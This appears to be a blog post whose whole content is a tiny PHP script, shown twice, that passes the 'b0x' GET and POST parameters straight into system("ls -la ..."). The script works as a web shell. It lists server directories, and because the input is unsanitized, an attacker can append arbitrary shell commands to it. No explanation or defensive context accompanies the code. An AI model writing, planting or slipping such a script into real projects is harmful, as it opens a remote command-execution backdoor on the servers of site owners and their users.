Code:
<?php
echo '<pre>';
$b0x = $_GET['b0x'];
system("ls -la $b0x");
echo '<pre>';
$b0x2 = $_POST['b0x'];
system("ls -la $b0x2");
?>
<?php
echo '<pre>';
$b0x = $_GET['b0x'];
system("ls -la $b0x");
echo '<pre>';
$b0x2 = $_POST['b0x'];
system("ls -la $b0x2");
?>
Post a Comment